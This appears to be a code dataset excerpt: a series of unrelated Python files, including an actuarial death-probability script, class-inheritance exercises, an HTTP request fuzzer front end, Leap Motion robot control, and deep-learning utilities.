bothtables=[[0.00756, 0.00052, 0.00035, 0.00025, 0.00020, 0.00018, 0.00017, 0.00016, 0.00014, 0.00011, 0.00009, 0.00010, 0.00015, 0.00027, 0.00043, 0.00061, 0.00078, 0.00094, 0.00107, 0.00119, 0.00131, 0.00142, 0.00149, 0.00151, 0.00148, 0.00143, 0.00140, 0.00138, 0.00137, 0.00139, 0.00141, 0.00143, 0.00147, 0.00152, 0.00158, 0.00165, 0.00174, 0.00186, 0.00202, 0.00221, 0.00243, 0.00267, 0.00291, 0.00317, 0.00344, 0.00373, 0.00405, 0.00441, 0.00480, 0.00524, 0.00573, 0.00623, 0.00671, 0.00714, 0.00756, 0.00800, 0.00853, 0.00917, 0.00995, 0.01086, 0.01190, 0.01301, 0.01413, 0.01522, 0.01635, 0.01760, 0.01906, 0.02073, 0.02265, 0.02482, 0.02729, 0.03001, 0.03289, 0.03592, 0.03918, 0.04292, 0.04715, 0.05173, 0.05665, 0.06206, 0.06821, 0.07522, 0.08302, 0.09163, 0.10119, 0.11183, 0.12367, 0.13679, 0.15124, 0.16702, 0.18414, 0.20255, 0.22224, 0.24314, 0.26520, 0.28709, 0.30846, 0.32891, 0.34803, 0.36544, 0.38371, 0.40289, 0.42304, 0.44419, 0.46640, 0.48972, 0.51421, 0.53992, 0.56691, 0.59526, 0.62502, 0.65628, 0.68909, 0.72354, 0.75972, 0.79771, 0.83759, 0.87947, 0.92345, 0.96962], [0.00615, 0.00041, 0.00025, 0.00018, 0.00015, 0.00014, 0.00014, 0.00013, 0.00012, 0.00011, 0.00010, 0.00010, 0.00012, 0.00016, 0.00021, 0.00028, 0.00034, 0.00039, 0.00042, 0.00043, 0.00045, 0.00047, 0.00048, 0.00049, 0.00050, 0.00051, 0.00052, 0.00053, 0.00056, 0.00059, 0.00063, 0.00068, 0.00073, 0.00078, 0.00084, 0.00091, 0.00098, 0.00108, 0.00118, 0.00130, 0.00144, 0.00158, 0.00173, 0.00189, 0.00206, 0.00225, 0.00244, 0.00264, 0.00285, 0.00306, 0.00329, 0.00355, 0.00382, 0.00409, 0.00437, 0.00468, 0.00505, 0.00549, 0.00603, 0.00665, 0.00736, 0.00813, 0.00890, 0.00967, 0.01047, 0.01136, 0.01239, 0.01357, 0.01491, 0.01641, 0.01816, 0.02008, 0.02210, 0.02418, 0.02641, 0.02902, 0.03206, 0.03538, 0.03899, 0.04301, 0.04766, 0.05307, 0.05922, 0.06618, 0.07403, 0.08285, 0.09270, 0.10365, 0.11574, 0.12899, 0.14343, 0.15907, 0.17591, 0.19393, 0.21312, 0.23254, 0.25193, 0.27097, 0.28933, 0.30670, 0.32510, 0.34460, 0.36528, 0.38720, 0.41043, 0.43505, 0.46116, 0.48883, 0.51816, 0.54925, 0.58220, 0.61714, 0.65416, 0.69341, 0.73502, 0.77912, 0.82587, 0.87542, 0.92345, 0.96962]]
def deathprob(age, years): # a formula to determine the probability a given person will die, with a number of years as input
#negative ages = female (this is Randall's comment)
act=[] #this is a list that will hold the relevant actuarial tables, male or female
if age<0: # if age is a negative number the person is female
act=bothtables[1] # use the second table (females)
age=-1*age # multiply age by -1 to make it positive
else:
act=bothtables[0] # use the first table (males)
while(len(act)<int(age+years+2)): # slower/bloaiter but keeps things clean (Randall's comment)
act.append(act[-1]**0.5) # I'm not sure what this does
liveprob=1
i=0
iage=int(age) # age as integer
fage=age%1 # fraction after age if it's a mixed number? maybe?
while i<=years-1: #advance through this formula for each year between now and the date in question
thisyear=(1-fage)*act[iage+i]+fage*act[iage+i+1] #the probability they will die this year is equal to this formula
liveprob*=1-thisyear # multiply the overall probability they will survive by the probability they will survive this year
i+=1
if years%1: # Amortizes risk of dying over a partial year, which is (Randall's comment)
# 1-P(living last full year)^(year fraction) (Randall's comment)
lastyear=(1-fage)*act[iage+i]+fage*act[iage+i+1]
lastyearlive=1-lastyear
lastyearlive=lastyearlive**((years%1))
liveprob*=lastyearlive
return 1-liveprob # return the probability they will die i.e. 1 - the probability they wil live
def proballdie(ages, years): # probability everyone in the list will die by a certain year, given the list "ages" and the number of years
probsliving=[]
for i in ages:
probsliving.append(1-deathprob(i, years))
prod=1
for i in probsliving:
prod*=(1-i)
return prod
def probanydie(ages, years): #returns the probability that anyone in the list dies
probsliving=[]
for i in ages:
probsliving.append(1-deathprob(i, years))
prod=1
for i in probsliving:
prod*=i
return 1-prod
def calcexp(ages, prob, flag): #calculates life expectancy based on the ages list, the probability of dying (5, 50, 95%), and whether or not it is "flagged" as calculating the probability that all or any die
i=0
for interval in (10, 1, 0.1, 0.01): #loops through the numbers at left
probs=0
while(probs<prob): #while the variable "probs" is less than the input probability
i+=interval #increase i by 10, 1, .1 or .01
if flag==0: #if we want to know the probability that the entire group will die
probs=proballdie(ages, i)
else:
probs=probanydie(ages, i) #if we want to know the probability that any member of the group will die
i-=interval #subtract the current interval from i before returning to start the for loop again with the subtracted i
return i #returns a float
ages=[] # creates an empty list that will hold the ages of everyone you want to know about
# print sys.argv[1:]
for arg in sys.argv[1:]: #for each argument you have entered except the first one (which is the script name)
gender=1
years=1.0
if arg[-1]=='m' or arg[-1]=='M': #If the last character of the argument is M or m, then the person is male and we will use their age as a positive number
try:
ages.append(1*float(arg[:-1])) #try adding all but the last character of the argument to the ages table. The last character indicates gender, preceding characters indicate age.
except:
print "Error parsing argument", arg
elif arg[-1]=='f' or arg[-1]=='F': #if the last character of the argument is F or f, then the person is female and we will use their age as a negative number
try:
ages.append(-1*float(arg[:-1])) #try adding all but the last character of the argument, times -1 because female, to the ages table. The last character indicates gender, preceding characters indicate age.
except:
print "Error parsing argument", arg
else: #if the input appears to be neither a male or female person with the age, it is probably the time period we want to know about
try:
years=float(arg)
break
except:
print "Error parsing argument", arg
# shows user how to enter input correctly if they do it wrong
if not sys.argv[1:]:
print "The format is 'actuary.py 15m 80f 23', with a list of ages and a number of years to run the projections."
raise SystemExit
if not ages:
print "No ages specified. Format is 12m, 17f, etc."
raise SystemExit
# print "Ages:", ages
# print "Years:", years
(datetime.date.today()+datetime.timedelta(days=365.242191*1)).year #adding date object to a timedelta object to get a date object. finds its year. does ??? with it
someone_years=[calcexp(ages, 0.05, 1), # this returns a list of floats, probably. Or strings???? used as strings below
calcexp(ages, 0.5, 1),
calcexp(ages, 0.95, 1)]
someone_dates=[(datetime.date.today()+datetime.timedelta(days=365.242191*someone_years[0])).year, # takes the above numbers and uses them to calculate a date based on today's date + total time.
(datetime.date.today()+datetime.timedelta(days=365.242191*someone_years[1])).year,
(datetime.date.today()+datetime.timedelta(days=365.242191*someone_years[2])).year]
print "There is a 5% chance of someone dying within", someone_years[0], "years (by", str(someone_dates[0])+")." #concatenates to avoid automatic space; must convert to string first.
print "There is a 50% chance of someone dying within", someone_years[1], "years (by", str(someone_dates[1])+")."
print "There is a 95% chance of someone dying within", someone_years[2], "years (by", str(someone_dates[2])+")."
print ""
if len(ages)>1: #only makes sense to do an everyone statement if there are multiple people.
everyone_years=[calcexp(ages, 0.05, 0),
calcexp(ages, 0.5, 0),
calcexp(ages, 0.95, 0)]
everyone_dates=[(datetime.date.today()+datetime.timedelta(days=365.242191*everyone_years[0])).year,
(datetime.date.today()+datetime.timedelta(days=365.242191*everyone_years[1])).year,
(datetime.date.today()+datetime.timedelta(days=365.242191*everyone_years[2])).year]
print "There is a 5% chance of everyone dying within", everyone_years[0], "years (by", str(everyone_dates[0])+")."
print "There is a 50% chance of everyone dying within", everyone_years[1], "years (by", str(everyone_dates[1])+")."
print "There is a 95% chance of everyone dying within", everyone_years[2], "years (by", str(everyone_dates[2])+")."
if years: # if the user has input year
yearword="years"
if years==1: # changes from plural to singular if "years" is 1, so it says "1 year" instead of "1 years"
yearword="year"
print ""
if years>datetime.date.today().year: # Program assumes years under current year are a number of years, and years over current year refer to the date. If input years is greater than the current year...
years=years-datetime.date.today().year #...recalculate the "years" variable to be the number of years in the future that year is
if len(ages)>1: #if there is more than one person being analyzed, we will look at the probability of everyone dying
p=100*proballdie(ages, years) # converts probability into a percentage by multiplying by 100
printable="" # the percentage we will print out
if p<0.001: # if the percentage is really low/almost impossible
printable="<0.001"
elif p>99.99: # if the percentage is really high/almost guaranteed
printable=">99.99"
else:
printable=str(p)[:5] # if the percentage is not at one of the above extremes we want to see the actual percentage in our output
print "Probability of all dying in", years, yearword+": ", printable+"%" #outputs the info in an easily readable format
p=100*probanydie(ages, years) #regardless of how many people there are we will want to know the probability anyone dies
printable="" # the percentage we will print out
if p<0.001:
printable="<0.001" # if the percentage is really low/almost impossible
elif p>99.99:
printable=">99.99" # if the percentage is really high/almost guaranteed
print p # I don't know why he is choosing to do this, it seems odd/inconsistent with rest of program
else:
printable=str(p)[:5] # convert p to a string and assign the first 5 characters to printable
print "Probability of a death within", years, yearword+":", printable+"%" #outputs the info in an easily readable format
raise SystemExit #leaves the program
|
4,356 | c18e452592d53f22858f2307c60aa997b809c3c3 | s = input()
st = '>>-->'
st2 = '<--<<'
sch1 = sch2 = 0
i = 0
j = 0
k = -1
while i != -1:
i = s.find(st, j)
if (k != i) and (i != -1):
k = i
sch1 += 1
j += 1
j = 0
i = 0
k = -1
while i != -1:
i = s.find(st2, j)
if (k != i) and (i != -1):
k = i
sch2 += 1
j += 1
print(sch1+sch2) |
4,357 | 95a2f5abb37642651316a8954a4289e5b04e4916 | # Class 1: Flight which contains the flight number(f_id), its origin and destination, the number of stops between the
# origin and destination and the type of airlines(f_type)
class Flight():
# INIT CONSTRUCTOR
def __init__(self, f_id, f_origin, f_destination, no_of_stops, flight_type, p_id, p_type):
self.f_id = f_id
self.origin = f_origin
self.destination = f_destination
self.stops = no_of_stops
self.flight_type = flight_type
self.pid = p_id
self.ptype = p_type
def get_flight_details(self,f_id):
print("Flight No:", f_id)
print("ORG:", self.origin)
print("DEST:", self.destination)
print("Flight Type:", self.flight_type)
# Class2: Person which contains the personID(p_id), their name, phone number, gender, type of person(
# employee/passenger) and it inherits the Flight class to get the flight details.
class Person(Flight):
# INIT CONSTRUCTOR
def __init__(self, p_id, p_type, p_gender, p_name, p_phonenumber, f_id, f_origin, f_destination, no_of_stops, flight_type):
self.name = p_name
self.gender = p_gender
self.p_phonenumber = p_phonenumber
# Here we also use super class to use the parameters from Flight class
super(Person, self).__init__(f_id, f_origin, f_destination, no_of_stops, flight_type, p_id, p_type)
# Here we used MULTIPLE INHERITANCE as the Person is derived from Flight and the Employee and Passenger is derived
# from Person.
# Class3: Employee which is an inherited class from Person, SSN is the private data member, since we cant reveal the
# SSN.
class Employee(Person):
# INIT CONSTRUCTOR
def __init__(self, p_id, p_type, p_gender, p_name, p_phonenumber, f_id, e_SSN, f_origin, f_destination, no_of_stops, flight_type):
super(Employee,self).__init__(p_id, p_type, p_gender, p_name, p_phonenumber, f_id, f_origin, f_destination, no_of_stops, flight_type)
self.__emp_SSN = e_SSN
# This method is to get the travel details of the employee
def get_travel_details_employee(self):
# print("Travel Details of ", self.emp_SSN)
print("Hello Pilot ", self.name, "Here are your flight details")
print("Flight_ID:", self.f_id)
print("ORG:", self.origin)
print("DEST:", self.destination)
# Class 4:Passenger which is an inherited class from Person, Passport Number is the private data member,
# since we cant reveal it.
class Passenger(Person):
names = []
d = dict()
# INIT CONSTRUCTOR
def __init__(self, p_id, p_type, p_gender, p_name, p_phonenumber, f_id, pno, f_origin, f_destination, no_of_stops, flight_type):
super(Passenger, self).__init__(p_id, p_type, p_gender, p_name, p_phonenumber, f_id, f_origin, f_destination, no_of_stops, flight_type)
self.pno = pno
# This is to get the travellers on the plane into a list, where we have the flightNumber(f_id)
# as the key and the passengername(name) as the value.
if self.f_id in Passenger.d.keys():
Passenger.d[self.f_id].append(self.name)
else:
Passenger.d[self.f_id] = [self.name]
# This method is to get the travel details of the passenger
def get_travel_details_passanger(self):
print("Travel Details of ", self.name)
print("Flight Id:", self.f_id)
print("Flight Type:", self.flight_type)
print("ORG:", self.origin)
print("DEST:", self.destination)
# This method is to print the dictionary where we have stored the passengers list for different flights
def get_travelling_passengers(self):
print("Passengers on the flight", Passenger.d)
class Ticket(Passenger):
def __init__(self, p_id, p_type, p_gender, p_name, p_phonenumber, f_id, pno, f_origin, f_destination, no_of_stops,
flight_type, boarding_group_no, row, seat_no):
super(Ticket, self).__init__(p_id, p_type, p_gender, p_name, p_phonenumber, f_id, pno, f_origin, f_destination,
no_of_stops, flight_type)
self.boarding_group_no = boarding_group_no
self.row = row
self.seat_no = seat_no
print("Your ticket details are below: ")
def get_boarding_pass(self, p_name):
for k, v in Passenger.d.items():
names = v
for i in names:
if i == p_name:
print("Passenger Name:", p_name)
print("Flight Id:", k)
print("Boarding Group and Seat No:", self.boarding_group_no, self.row, self.seat_no)
print("ORG:", self.origin)
print("DEST:", self.destination)
|
4,358 | 003976d850e371e01e6d0a307d3cf366f962c53d | from abc import abstractmethod
class BaseButton:
@abstractmethod
def render(self):
pass
@abstractmethod
def on_click(self):
pass
class WindowsButton(BaseButton):
def render(self):
print("Render window button")
def on_click(self):
print("On click")
class HtmlButton(BaseButton):
def render(self):
print("Render html button")
def on_click(self):
print("On click")
class BaseDialog:
@abstractmethod
def create_button(self) -> BaseButton:
pass
def render(self):
ok_btn = self.create_button()
ok_btn.render()
class WindowsDialog(BaseDialog):
def create_button(self) -> BaseButton:
return WindowsButton()
class WebDialog(BaseDialog):
def create_button(self) -> BaseButton:
return HtmlButton()
class Application:
def __init__(self):
self.dialog = self.get_dialog()
def read_config(self) -> dict:
return {}
def get_dialog(self):
config: dict = self.read_config()
if config.get("OS") == "Windows":
return WindowsDialog()
return WebDialog()
def render(self):
self.dialog.render()
if __name__ == "__main__":
app = Application()
app.render()
|
4,359 | bf133e73f0c842603dbd7cc3a103a2aa95e2236e | from Common.TreasureIsland import TIenv
from .Agent import TIagent
import torch
feature_size = (8, 8)
env = TIenv(frame_rate=0, num_marks=1, feature_size=feature_size)
agent = TIagent(feature_size=feature_size, learning_rate=0.0001)
EPISODE_COUNT = 50000
STEP_COUNT = 40
for episode in range(EPISODE_COUNT):
obs = env.reset()
agent.reset()
steps = 0
if (episode + 1) % 100 == 0:
state = {
'model_state': agent.model.state_dict(),
'optim_state': agent.optim.state_dict()
}
torch.save(state, "models/" + str(episode+1) + '.pt')
env.save_value_and_policy_map_for_A2C(agent.model, 'images/' + str(episode+1) + '.png')
while True:
env.render()
action = agent.action(obs)
obs = env.step(action)
agent.reward(obs.reward)
if obs.done:
agent.train(obs)
break
steps += 1
if steps % STEP_COUNT == 0:
agent.train(obs)
continue
print(str(episode + 1) + ": " + str(agent.episode_reward))
|
4,360 | d6cea40e907a0424b2b1b8162f19aa8203443e55 | n = int(input())
a = oct(n)
b = hex(n)
print(a[2:],b[2:].upper())
#.upper : 소문자 -> 대문자
|
4,361 | 9ba60270a4afcf242de53692afd8ebff7d9b37a7 | from abc import ABC
class Parent(ABC):
def printing(self):
print(self._words)
class Parent2(ABC):
form = "Parent2 Setup: %s"
class Child(Parent, Parent2):
def __init__(self, words):
self._words = self.form % words
super(Child, self).printing()
if __name__ == "__main__":
Child("hello world")
|
4,362 | cabebeb5ca02da2505df4a138e8b28f74dd108fa |
class ClickAction:
Click = 0
DoubleClick = 1
class MouseButton:
Left = 0
Right = 1
Middle = 2 |
4,363 | 350a79d6cead6814ad48292b14a204e753dc938c | # Testing
import sys, os
sys.dont_write_bytecode = True
import argparse, socket
from requestframe import RequestFrame
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--header-mutate-level", type=int, choices=range(11), nargs='?', help="Set the mutation level for the headers (0-10). Default = 5", default=5)
parser.add_argument("--body-mutate-level", type=int, choices=range(11), nargs='?', help="Set the mutation level for the body (0-10). Default = 5", default=5)
parser.add_argument("--request-mutate-level", type=int, choices=range(11), nargs='?', help="Set the mutation level for the request line (0-10). Default = 5", default=5)
parser.add_argument("--body-type", type=str, choices=['json', 'junk', 'rand'], help="Set the data generated in the request body. Default = rand", default='rand')
parser.add_argument("--num-headers", type=int, help="Sets the maximum number of headers. Default = number of available headers", default=-1)
parser.add_argument("--generate-num", type=int, help="Number of requests to generate. Any more than 1 generated request will output to a new folder called output/. Default = 1", default=1)
parser.add_argument('-v', '--version', action='version', version='HTTPFuzz Version: 1.0.1')
args = parser.parse_args()
if args.generate_num > 1:
try:
os.mkdir("output")
for i in range(args.generate_num):
with open("output/{}.txt".format(i + 1), 'w') as f:
request_frame = RequestFrame(args)
request_frame.generate()
f.write(request_frame.request)
print("[+] Wrote request to /output/{}.txt".format(i + 1))
exit("[+] Finished creating requests")
except:
exit("[-] Couldn't make the output directory. It might already exist.")
request_frame = RequestFrame(args)
request_frame.generate()
exit(request_frame.request)
|
4,364 | b34e293b509328c728909262594bdf3d3ecf5360 | #!/usr/bin/env python2
# A basic example of sending Blue a command in cartesian space.
from blue_interface import BlueInterface
import numpy as np
import time
import sys
import argparse
import Leap
from utils.rotations import quat2euler, euler2quat, mat2euler
from utils.leap_listener import SampleListener
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description='switch the control mode')
parser.add_argument('--IK', default=False, action='store_true',
help='switch to IK-control')
args = parser.parse_args()
side = "right"
ip = "127.0.0.1"
blue = BlueInterface(side, ip)
# Initialize the blue gripper
blue.calibrate_gripper()
# Leap Motion
listener = SampleListener()
controller = Leap.Controller()
target_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])
target_angles_hist = target_angles_init.copy()
i = 0
while True:
hands_data = listener.get_hand(controller)
## IK approach
if args.IK:
if "Right hand" in hands_data.keys():
hand_data = hands_data["Right hand"]
pos = hand_data['palm_position']
ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
grab_strength = hand_data['grab_strength']
target_position = [x/1000 for x in pos] # x, y, z
pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z
ori[0], ori[1], ori[2] = ori[2], -ori[0]+3.14, ori[1] # z y x to x y z
# Adjust the offset
target_position[0] -= 0.4
target_position[2] += 0.3
target_orientation = list(euler2quat(ori)) # w, x, y, z
# target_orientation = target_orientation[1:] + target_orientation[:1]
# Compute IK solution
goal_curr = blue.inverse_kinematics(target_position, target_orientation)
# Send command to robot
if goal_curr != []:
goal = goal_curr
print("goal: ", goal)
blue.set_joint_positions(goal, duration=3, soft_position_control=False)
blue.command_gripper(grab_strength, 10.0, wait=False)
# Wait for system to settle
i+=1
time.sleep(3)
# Direct motor angle mapping approach
else:
if "Right hand" in hands_data.keys():
hand_data = hands_data["Right hand"]
pos = hand_data['palm_position']
ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
grab_strength = hand_data['grab_strength']
pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z
ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1] # z y x to x y z
target_position = [x/1000 for x in pos] # x, y, z
target_position[0] += 0.05
target_position[2] -= 0.2
# Pre-defined Initial position of the robot
target_angles = target_angles_init.copy()
# orientation
target_angles[0] += (ori[0]*1 + target_position[1]*1.5) # shoulder dir
target_angles[4] += ori[2] # arm twist
target_angles[5] += ori[1]*2 # wrist up down
target_angles[6] += ori[2] # wrist twist
# height
target_angles[1] += target_position[2]*5
target_angles[3] -= target_position[2]*5
# depth direction stretch
target_angles[3] -= target_position[0]*10
smoothening = True
if smoothening:
alpha = 0.9
target_angles = target_angles*(1-alpha) + target_angles_hist*alpha
target_angles_hist = target_angles
# Send command to robot
print("target_angles: ", target_angles)
blue.set_joint_positions(target_angles, duration=0.0025, soft_position_control=False)
if "Left hand" in hands_data.keys():
hand_data = hands_data["Left hand"]
pos = hand_data['palm_position']
ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
grab_strength = hand_data['grab_strength']
blue.command_gripper(ori[1], 20.0, wait=False)
# Wait for system to settle
i+=1
time.sleep(0.025)
|
4,365 | 364d70fab02291bafadebea68fee94c0210e2de9 | """
Various utilities for neural networks implemented by Paddle. This code is rewritten based on:
https://github.com/openai/guided-diffusion/blob/main/guided_diffusion/nn.py
"""
import math
import paddle
import paddle.nn as nn
class SiLU(nn.Layer):
def forward(self, x):
return x * nn.functional.sigmoid(x)
class GroupNorm32(nn.GroupNorm):
def forward(self, x):
return super().forward(x)
def conv_nd(dims, *args, **kwargs):
"""
Create a 1D, 2D, or 3D convolution module.
"""
if dims == 1:
return nn.Conv1D(*args, **kwargs)
elif dims == 2:
return nn.Conv2D(*args, **kwargs)
elif dims == 3:
return nn.Conv3D(*args, **kwargs)
raise ValueError(f"unsupported dimensions: {dims}")
def linear(*args, **kwargs):
"""
Create a linear module.
"""
return nn.Linear(*args, **kwargs)
def avg_pool_nd(dims, *args, **kwargs):
"""
Create a 1D, 2D, or 3D average pooling module.
"""
if dims == 1:
return nn.AvgPool1D(*args, **kwargs)
elif dims == 2:
return nn.AvgPool2D(*args, **kwargs)
elif dims == 3:
return nn.AvgPool3D(*args, **kwargs)
raise ValueError(f"unsupported dimensions: {dims}")
def update_ema(target_params, source_params, rate=0.99):
"""
Update target parameters to be closer to those of source parameters using
an exponential moving average.
:param target_params: the target parameter sequence.
:param source_params: the source parameter sequence.
:param rate: the EMA rate (closer to 1 means slower).
"""
for targ, src in zip(target_params, source_params):
targ.detach().mul_(rate).add_(src, alpha=1 - rate)
def zero_module(module):
"""
Zero out the parameters of a module and return it.
"""
for p in module.parameters():
p.detach().zero_()
return module
def scale_module(module, scale):
"""
Scale the parameters of a module and return it.
"""
for p in module.parameters():
p.detach().mul_(scale)
return module
def mean_flat(tensor):
"""
Take the mean over all non-batch dimensions.
"""
return tensor.mean(axis=list(range(1, len(tensor.shape))))
def normalization(channels):
"""
Make a standard normalization layer.
:param channels: number of input channels.
:return: an nn.Module for normalization.
"""
return GroupNorm32(32, channels)
def timestep_embedding(timesteps, dim, max_period=10000):
"""
Create sinusoidal timestep embeddings.
:param timesteps: a 1-D Tensor of N indices, one per batch element.
These may be fractional.
:param dim: the dimension of the output.
:param max_period: controls the minimum frequency of the embeddings.
:return: an [N x dim] Tensor of positional embeddings.
"""
half = dim // 2
freqs = paddle.exp(-math.log(max_period) * paddle.arange(start=0, end=half, dtype=paddle.float32) / half)
args = paddle.cast(timesteps[:, None], 'float32') * freqs[None]
embedding = paddle.concat([paddle.cos(args), paddle.sin(args)], axis=-1)
if dim % 2:
embedding = paddle.concat([embedding, paddle.zeros_like(embedding[:, :1])], axis=-1)
return embedding
def checkpoint(func, inputs, params, flag):
"""
This function is disabled. And now just forward.
"""
return func(*inputs)
|
4,366 | 431f109903e014a29aed7f125d47f327e17b9f65 | from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.urls import reverse
from gatheros_event.views.mixins import AccountMixin
from gatheros_subscription.helpers.extract import (
create_extract,
get_extract_file_name,
)
from gatheros_subscription.models import Subscription
class ExtractSubscriptionPDFView(AccountMixin):
subscription = None
def pre_dispatch(self, request):
uuid = self.kwargs.get('pk')
self.subscription = get_object_or_404(Subscription,
uuid=uuid)
return super().pre_dispatch(request)
def get_permission_denied_url(self):
""" Resgata url quando permissão negada. """
return reverse('subscription:subscription-view', kwargs={
'event_pk': self.kwargs.get('event_pk'),
'pk': self.kwargs.get('pk'),
})
def get(self, request, *args, **kwargs):
pdf = create_extract(subscription=self.subscription,
user=self.request.user)
response = HttpResponse(pdf, content_type='application/pdf')
response['Content-Disposition'] = 'inline; filename="{}"'.format(
get_extract_file_name(subscription=self.subscription)
)
return response
def can_access(self):
return self.subscription.lot.price > 0
|
4,367 | 591d0a166af5b8d0bed851c2f56ecc3da4f3a5eb | """
Generates a temperature celsius to fahrenheit conversion table
AT
11-10-2018
"""
__author__ = "Aspen Thompson"
header = "| Celsius | Fahrenheit |"
line = "-" * len(header)
print("{0}\n{1}\n{0}".format(line, header))
for i in range(-10, 31):
print("| {:^7} | {:^10.10} |".format(i, i * 1.8 + 32))
|
4,368 | 883d2efeb6d7d43cf82eef2e0397110fd8e3ea03 | # Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""eval standalone script"""
import os
import re
import argparse
from mindspore import context
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from src.dataset import create_dataset
from src.config import eval_cfg, student_net_cfg, task_cfg
from src.tinybert_model import BertModelCLS
def parse_args():
"""
parse args
"""
parser = argparse.ArgumentParser(description='ternarybert evaluation')
parser.add_argument('--device_target', type=str, default='Ascend', choices=['Ascend', 'GPU'],
help='Device where the code will be implemented. (Default: GPU)')
parser.add_argument('--device_id', type=int, default=0, help='Device id. (Default: 0)')
parser.add_argument('--model_dir', type=str, default='', help='The checkpoint directory of model.')
parser.add_argument('--data_dir', type=str, default='', help='Data directory.')
parser.add_argument('--task_name', type=str, default='sts-b', choices=['sts-b', 'qnli', 'mnli'],
help='The name of the task to train. (Default: sts-b)')
parser.add_argument('--dataset_type', type=str, default='tfrecord', choices=['tfrecord', 'mindrecord'],
help='The name of the task to train. (Default: tfrecord)')
parser.add_argument('--batch_size', type=int, default=32, help='Batch size for evaluating')
parser.add_argument('--data_name', type=str, default='eval.tf_record', help='')
return parser.parse_args()
def get_ckpt(ckpt_file):
lists = os.listdir(ckpt_file)
lists.sort(key=lambda fn: os.path.getmtime(ckpt_file + '/' + fn))
return os.path.join(ckpt_file, lists[-1])
def do_eval_standalone(args_opt):
"""
do eval standalone
"""
ckpt_file = os.path.join(args_opt.model_dir, args_opt.task_name)
ckpt_file = get_ckpt(ckpt_file)
print('ckpt file:', ckpt_file)
task = task_cfg[args_opt.task_name]
student_net_cfg.seq_length = task.seq_length
eval_cfg.batch_size = args_opt.batch_size
eval_data_dir = os.path.join(args_opt.data_dir, args_opt.task_name, args_opt.data_name)
context.set_context(mode=context.GRAPH_MODE, device_target=args_opt.device_target, device_id=args.device_id)
eval_dataset = create_dataset(batch_size=eval_cfg.batch_size,
device_num=1,
rank=0,
do_shuffle=False,
data_dir=eval_data_dir,
data_type=args_opt.dataset_type,
seq_length=task.seq_length,
task_type=task.task_type,
drop_remainder=False)
print('eval dataset size:', eval_dataset.get_dataset_size())
print('eval dataset batch size:', eval_dataset.get_batch_size())
eval_model = BertModelCLS(student_net_cfg, False, task.num_labels, 0.0, phase_type='student')
param_dict = load_checkpoint(ckpt_file)
new_param_dict = {}
for key, value in param_dict.items():
new_key = re.sub('tinybert_', 'bert_', key)
new_key = re.sub('^bert.', '', new_key)
new_param_dict[new_key] = value
load_param_into_net(eval_model, new_param_dict)
eval_model.set_train(False)
columns_list = ["input_ids", "input_mask", "segment_ids", "label_ids"]
callback = task.metrics()
for step, data in enumerate(eval_dataset.create_dict_iterator()):
input_data = []
for i in columns_list:
input_data.append(data[i])
input_ids, input_mask, token_type_id, label_ids = input_data
_, _, logits, _ = eval_model(input_ids, token_type_id, input_mask)
callback.update(logits, label_ids)
print('eval step: {}, {}: {}'.format(step, callback.name, callback.get_metrics()))
metrics = callback.get_metrics()
print('The best {}: {}'.format(callback.name, metrics))
if __name__ == '__main__':
args = parse_args()
do_eval_standalone(args)
|
4,369 | 098c91f4aa367cb389e542c0199b633e7ecd4003 | from ccapi.interfaces.bitfinex import Bitfinex
from ccapi.interfaces.bittrex import Bittrex
from ccapi.interfaces.poloniex import Poloniex
from ccapi.interfaces.bithumb import Bithumb
from ccapi.interfaces.coinone import Coinone
from ccapi.interfaces.korbit import Korbit
# from ccapis.interfaces.coinbase import Coinbase
|
4,370 | 03b38e6e2d0097d5d361b0794aba83b8e430323d | from .storage import Storage
class ConnectionManager:
def __init__(self):
self.store = Storage()
def handle(self,msg):
if msg['type'] in {'register', 'heartbeat'}:
self.store.reg_hb(**msg['payload'])
elif msg['type'] == 'result':
self.store.result(msg['payload'])
return 'send back {}'.format(msg)
def add_task(self,msg:dict):
return self.store.add_task(msg)
def get_task(self, agent_id):
return self.store.get_task(agent_id)
sendmsg = handle
def get_agents(self):
return self.store.get_agent()
def set_task(self,task_id, state):
self.store.tasks[task_id].state = state |
4,371 | 6fe22b3f98bff1a9b775fce631ae94a4ee22b04c | """Sorting components: peak waveform features."""
import numpy as np
from spikeinterface.core.job_tools import fix_job_kwargs
from spikeinterface.core import get_channel_distances
from spikeinterface.sortingcomponents.peak_localization import LocalizeCenterOfMass, LocalizeMonopolarTriangulation
from spikeinterface.sortingcomponents.peak_pipeline import run_peak_pipeline, PipelineNode, ExtractDenseWaveforms
def compute_features_from_peaks(
recording,
peaks,
feature_list=["ptp", ],
feature_params={},
ms_before=1.,
ms_after=1.,
**job_kwargs,
):
"""Extract features on the fly from the recording given a list of peaks.
Parameters
----------
recording: RecordingExtractor
The recording extractor object.
peaks: array
Peaks array, as returned by detect_peaks() in "compact_numpy" way.
feature_list: List of features to be computed.
- amplitude
- ptp
- com
- energy
ms_before: float
The duration in ms before the peak for extracting the features (default 1 ms)
ms_after: float
The duration in ms after the peakfor extracting the features (default 1 ms)
{}
Returns
-------
A tuple of features. Even if there is one feature.
Every feature have shape[0] == peaks.shape[0].
dtype and other dim depends on features.
"""
job_kwargs = fix_job_kwargs(job_kwargs)
extract_dense_waveforms = ExtractDenseWaveforms(recording, ms_before=ms_before, ms_after=ms_after, return_output=False)
nodes = [
extract_dense_waveforms,
]
for feature_name in feature_list:
Class = _features_class[feature_name]
params = feature_params.get(feature_name, {}).copy()
node = Class(recording, parents=[extract_dense_waveforms], **params)
nodes.append(node)
